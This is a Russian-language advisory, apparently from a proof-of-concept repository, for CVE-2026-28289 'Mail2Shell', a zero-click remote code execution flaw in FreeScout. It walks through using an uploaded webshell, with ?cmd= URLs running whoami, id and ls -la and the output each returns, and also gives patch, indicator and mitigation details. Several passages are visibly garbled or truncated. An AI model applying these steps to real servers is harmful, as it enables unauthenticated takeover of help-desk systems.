
CVE-2026-28289

Zero-Click RCE без аутентификации в FreeScout через обход проверки вложений электронной почты
CVE-2026-28289, прозванная Mail2Shell, — это критическая zero-click уязвимость удалённого выполнения кода (RCE), затрагивающая FreeScout.
Злоумышленник может отправить специально сформированное электронное письмо на почтовый ящик FreeScout и получить удалённый доступ к командной оболочке (shell) базового сервера — без аутентификации и без взаимодействия с пользователем.
| Поле | Значение |
|---|
| CVE ID | CVE-2026-28289 |
| Критичность | 🔴 Критическая |
| CVSS | 10.0 (Максимум) |
| Вектор атаки | Удалённый (Email) |
| Требуется аутентификация | ❌ Нет |
| Взаимодействие с пользователем | ❌ Нет |
| Воздействие | Полная компрометация сервера |
Злоумышленник отправляет письмо со специально сформированным вложением.
FreeScout пытается блокировать опасные файлы, такие как .htaccess, но злоумышленник:
Злоумышленник обращается к загруженному файлу по веб-пути и выполняет произвольные команды.
Результат:
# Remote shell access achieved
whoami
www-data

✅ Email sent successfully! (Zero-Click RCE triggered)
На экран также будут выведены инструкции для следующих шагов.
find на вашем сервере FreeScout через SSHОна немедленно вернёт полный реальный путь к загруженному файлу, например:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(или похожую папку с датой/временем — это подтверждает, что FreeScout сохранил вложение автоматически).
Скопируйте путь из шага 2 и откройте этот URL:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
Вы увидите именно такой вывод (простой текст):
www-data
(Или каким бы ни был пользователь Apache/PHP на вашем сервере — обычно www-data, apache или nobody).
Теперь измените команду и обновите страницу:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
Вы увидите:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
А для ls -la:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
Этот вывод появляется напрямую на странице браузера (внутри тегов <pre> веб-оболочки). Никаких ошибок, никакого исходного кода PHP, никакой 404.
Это означает, что у вас полное удалённое выполнение кода на сервере — обход через .htaccess + пробел нулевой ширины сработал идеально, а вложение электронной почты было обработано без какого-либо взаимодействия с пользователем.
Все версии FreeScout:
<= 1.8.206
Немедленно обновитесь до:
1.8.207 or later
AllowOverride All в конфигурации ApacheОбратите внимание на:
.htaccess/storage/attachments/Индикаторы компрометации могут включать:
.htaccess в папках вложенийEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
Эта проблема обошла защиту, добавленную в:
Что демонстрирует неполную логику санитизации имён файлов.
| Область риска | Воздействие |
|---|---|
| Конфиденциальность | 🔴 Высокое |
| Целостность | 🔴 Высокое |
| Доступность | 🔴 Высокое |
Если вы запускаете собственный экземпляр FreeScout (self-hosted):
🔥 Немедленно установите патч. 💡 Считайте, что система скомпрометирована, если уязвимая версия была доступна из интернета. 🛡 Проведите анализ журналов и проверку целостности.